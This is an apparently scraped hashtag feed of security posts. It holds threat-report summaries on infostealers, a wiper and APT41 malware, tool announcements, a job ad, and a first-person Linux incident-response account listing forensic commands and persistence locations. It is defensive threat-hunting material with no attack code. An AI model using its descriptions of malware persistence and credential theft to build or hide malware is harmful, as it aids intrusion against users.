π‘οΈ Meet the WardenShield MS9: Your Ultimate Malware Scanner π¦ βοΈ
Say goodbye to hidden threats and hello to powerful protection.
π Learn more:
π https://wardenshield.com/wardenshield-ms9-malware-scanner
#MalwareScanner #CyberSecurity #WardenShield #DigitalDefense #APTDetection #infosec #ThreatHunting #CyberThreats
π Position: Security Engineer
π Location: Chennai
π§ Experience: 2-5 years
π© Apply: resumes@overturerede.zohorecruitmail.in
π Contact: 9582224661
#SecurityEngineer #CyberSecurity #SOCAnalyst #SIEMTools #ThreatHunting #EDR #ChennaiJobs #HiringNow #OvertureRede
Happy Wednesday everyone!
A "fully undetected #infostealer malware sample written in Rust" was identified by Trellix researchers while conducting a proactive hunt! The distribution should not come as any surprise, fraudulent gaming websites! This is not an old tactic and something that I have read about from many vendors (Remember, downloading cracked or "free" games from sites normally means you just aren't paying with money!). In this case, the "game" files were distributed as password-protected rar files which contained the stealer executable with some legitimate game-related files. This is another tactic that is commonly used to "assure" the user that they downloaded something legitimate.
The researchers also discussed the capabilities of the malware and here are just a few:
- It displayed a fake window to the user to fool them into it being a legitimate application.
- It terminates a list of processes, some that relate to browsers.
- Steals passwords, cookies, autofills, and saved credit card information from applications like Discord and Chrome.
- Drops a copy of itself in the \AppData\Roaming directory and saves a .lnkk file in the startup directory for persistence. The attackers link the executable and the .lnkk through registry keys so it can execute the .exe file properly.
Thanks goes to the researchers (who if you want tagged in here let me know!) for the great report and details! I hope you enjoy the read as much as I did and go check out the details I left out, its worth it! Happy Hunting!
Demystifying Myth Stealer: A Rust Based InfoStealer
https://www.trellix.com/en-in/blogs/research/demystifying-myth-stealer-a-rust-based-infostealer/
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday
Good day everyone!
This is a really interesting read from SentinelOne Labs . Back in October 2024 they dealt with a reconnaissance operation that was related to the activity cluster tracked as #PurpleHaze and then in 2025 "they helped disrupt an intrusion linked to a wider #ShadowPad operation". The activity was attributed to China-nexus threat actors.
The article gives an in-depth view of what it looks like when an organization that is responsible for "IT services and logistics" gets compromised, which we could call a supply-chain attack. The article also provides a TON of technical details about tools and infrastructure that was used, indicators of compromise to scan for in your environment, and behaviors and commands that were observed throughout. This one may take a while to read but its worth it! Thanks to the researchers Dr Aleksandar Milenkoski and Tom Hegel for this report! I hope you all enjoy it as much as I did. Happy Hunting!
Follow the Smoke | China-nexus Threat Actors Hammer At the Doors of Top Tier Targets
https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday
π Threat detected? Slipper deployed.
In cybersecurity, just like at momβs house:
If it moves funny, it gets neutralized before it hits the floor. π©΄π¨
π Just dropped a new Kunai release! π
We've been working hard on some exciting new features and performance boosts that we can't wait for you to try out! Here's what's new:
New Features:
π Track io_uring operations with new io_uring_sqe events!
π Get more context with parent command line information for execve and execve_script events.
π Get information about matching filtering rules in final events.
π§ͺ Test your filters with ease using the new test command.
Improvements:
β‘ Experience performance boosts thanks to changes in the event matching engine and code refactoring.
Ready to dive in? Check out the full release notes here: https://github.com/kunai-project/kunai/releases/tag/v0.6.0
Don't hesitate to give Kunai a try and share your feedback! Let's make Kunai even better together!
#Linux #ThreatHunting #ThreatDetection #DFIR #DetectionEngineering #OpenSource
OtterCookie is a stealer malware linked to North Koreaβs Lazarus Group. It targets tech, finance, and crypto professionals through fake interviews and uses obfuscated JavaScript to steal credentials and walletsπ΅οΈββοΈ
https://any.run/cybersecurity-blog/ottercookie-malware-analysis
#infosec #cybersecurity #malware #threatintel #threathunting
Happy Monday Everyone!
Researchers at Cisco Talos "observed a destructive attack on a critical infrastructure entity within Ukraine, using a previously unknown wiper we are calling β#PathWiperβ". The article states "The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, that was then used to issue malicious commands and deploy PathWiper across connected endpoints".
The researchers also provided technical details, some IOCs, capabilities of the wiper, and some hints at behaviors. In this incident a batch (BAT) file was dropped on the compromised machine and ran a command that leveraged WScript.exe to execute a VBScript (uacinstall.vbs) from the C:\Windows\Temp\ directory. After the execution, the PathWiper executable appears in the C:\Windows\Temp\ directory with the name of "sha256sum.exe". So assuming this is how the malware or actor operates, you can hunt for new scripting files or executables in the C:\Windows\Temp directory. Now this is not a fool proof method as behaviors can change, but it could be a great start when hunting for this threat! Thank you to the researchers and I hope you enjoy the article! Happy Hunting!
Newly identified wiper malware βPathWiperβ targets critical infrastructure in Ukraine
https://blog.talosintelligence.com/pathwiper-targets-ukraine/
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday
Agentic AI and the Future of Autonomous Cyber Defense
https://youtu.be/pqkeYSfG1nc #cybersecurity #AIinSecurity #AgenticAI #AutonomousSecurity #AIThreatDetection #CyberDefense #SecurityAutomation #AIvsCybercrime #Infosec #AITools #ThreatHunting
Good day everyone!
As you know I am a big advocate for threat hunting and I like to post the articles that I read related to it but there is a bigger picture that I normally leave out because of my perspective. As a threat hunter I like to look at behaviors and artifacts (Indicators of Attack) and the MITRE ATT&CK Matrix but something I should probably start talking more about is the overall picture of the Threat Hunting Life-cycle. Really, this was brought about because of the joint advisory from Cybersecurity and Infrastructure Security Agency and the Federal Bureau of Investigation (FBI) as well as the Australian Government they released on the #Play Ransomware. This isn't the first time that I have read it and hopefully wont be the last simply because of these couple of lines:
"June 4, 2025: The advisory was updated to reflect new TTPs employed by Play ransomware group, as well as provide current IOCs/remove outdated IOCs for effective threat hunting." Above it they mention that the original advisory was published in December 18, 2023 but the fact that they are returning to the these and updating them with new TTPs and providing new IOCs is a GREAT example of the Threat Hunting Life-cycle.
So if you do have a threat hunting program in your environment, maybe implement something similar to your hunts if you haven't do so already. Revisit the hunts that have been conducted already in your environment and see if the information within is still current and if not, update it accordingly! Have a wonderful day and Happy Hunting!
#StopRansomware: Play Ransomware
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #ransomware #readoftheday
@phoenixx You might well have that in your list already, but I would include also /var/spool/cron (particularly /var/spool/cron/atjobs) in the list of directories to check for signs of persistence.
#Linux #IncidentResponse #BlueTeam #forensics #ITForensics #ComputerForensics #infosec #ThreatHunting
Good day everyone!
If you are interested in Threat Hunting and happen to be at the SANS Institute DFIR Summit in Utah, Arun Warikoo and I will be discussing when to use structured and unstructured hunts and what that would look like! I look forward to it and hope to meet a ton of new people! Have a wonderful day and Happy Hunting!
DFIR Summit & Training 2025
https://www.sans.org/cyber-security-training-events/digital-forensics-summit-2025/
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting
Cisco IOS XE WLC Arbitrary File Upload Vulnerability (CVE-2025-20188) Analysis:
#cybersecurity #xxe #infosec #cve #vulnerability #threathunting #exploitation
Cisco IOS XE WLC Arbitrary File Upload Vulnerability (CVE-2025-20188) Analysis:
#cybersecurity #xxe #infosec #cve #vulnerability #threathunting #exploitation
Okay, so I wanted to share a little incident from a few months back that really hammered home the power of knowing your Linux internals when things go sideways. I got a frantic call, "something weird is going on with our build server, it's acting sluggish and our monitoring is throwing odd network alerts." No fancy EDR on this particular box, just the usual ssh and bash. My heart always sinks a little when it's a Linux box with vague symptoms, because you know it's time to get your hands dirty.
First thing I did, even before reaching for any specific logs, was to get a quick snapshot of the network. Instead of netstat, which honestly feels a bit dated now, I immediately hit ss -tunap. That p is crucial cause it shows you the process and user ID for each connection. What immediately jumped out was an outbound TCP connection on a high port to a sketchy-looking IP, and it was tied to a process that definitely shouldn't have been making external calls. My gut tightened. I quickly followed up with lsof -i just to be super sure no deleted binaries were clinging on to network connections.
With that IP and PID in hand, I moved to process investigation. pstree -ap was my next stop. It showed the suspicious process, and more importantly, its parent. It wasn't a child of systemd or a normal service. It was spawned by a build script that shouldn't have been executing anything like this. That hierarchical view was key. Then, to really understand what this thing was doing, I dared to strace -p <PID>. Watching the system calls unfurl was like watching a movie of its malicious intent: it was reading from /etc/passwd, making connect() calls, and trying to write to some odd /tmp directories. Simultaneously, I checked ls -l /proc/<PID>/exe to confirm the actual binary path (it was indeed in /tmp) and /proc/<PID>/cwd to see its working directory. No doubt, this was a rogue process.
Knowing it was a fresh infection, I immediately shifted to the filesystem. My go-to is always find / -type f -newermt '2 days ago' -print0 | xargs -0 ls -latr. This quickly pulls up any files modified in the last 48 hours, sorted by modification time. It's often where you find dropped payloads, modified configuration files, or suspicious scripts. Sure enough, there were a few more binaries in /tmp and even a suspicious .sh script in a developer's home directory. I also scanned for SUID/SGID binaries with find / -perm /6000 just in case they'd dropped something for privilege escalation. And while stat's timestamps can be tampered with, I always glance at atime, mtime, and ctime on suspicious files; sometimes, a subtle mismatch offers a tiny clue if the attacker wasn't meticulous.
The final piece of the puzzle, and often the trickiest, is persistence. I checked the usual suspects: crontab -l for root and every other user account I could find. Then I cast a wider net with grep -r "suspect_domain_or_ip" /etc/cron.* /etc/systemd/system/ /etc/rc.d/ and similar common boot directories. Sure enough, a new systemd timer unit had been added that was scheduled to execute the /tmp binary periodically. Finally, I didn't forget the user dotfiles (~/.bashrc, ~/.profile, etc.). Itβs surprising how often an attacker will drop a malicious alias or command in there, assuming you won't dig deep into a developer's setup.
Long story short, we quickly identified the ingress vector, isolated the compromise, and cleaned up the persistence. But what really stuck with me is how quickly you can triage and understand an incident if you're comfortable with these fundamental Linux commands. There's no substitute for getting your hands dirty and really understanding what strace is showing you or why ss is superior to netstat in a high-pressure situation. These tools are your best friends in a firefight.
#linux #incidentresponse #blueteam #forensics #shell #bash #sysadmin #infosec #threathunting #lessonslearned
Happy Monday everyone!
The Google Threat Intel Group (GTIP) discovered that a government website was hosting malware being used to target multiple other government entities and, with high confidence, attributed the activity to hashtag#APT41 (a.k.a. HOODOO). The group used a piece of malware dubbed #Toughprogress which executes on the compromised host and uses the Google Calendar for command-and-control (C2) communications. The initial access vector was a spear-phishing email that contained a link to a ZIP file which held an LNK masquerading as a pdf, and a directory, which all played their part in the attack. This was a great read and I hope you enjoy it too! Happy Hunting!
Mark Your Calendar: APT41 Innovative Tactics
https://cloud.google.com/blog/topics/threat-intelligence/apt41-innovative-tactics
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday
Is anyone familiar with this kind of file name? Looks like it's generated from some sort of C2 framework but I'm not sure what. #threathunting
Maintaining motivation for threat hunts is hard when you're on a long streak of nothing found or simply can't do because of "limitations." It might be easier to flip the scope to what do "I" want to learn and turn that into a hunt.
#ThreatHunting
This blog is a little bitter, but it's what it isπ«
Detecting Vulnerable Drivers (a.k.a. LOLDrivers) the Right Way
https://academy.bluraven.io/blog/detecting-vulnerable-drivers-using-defender-for-endpoint-kql
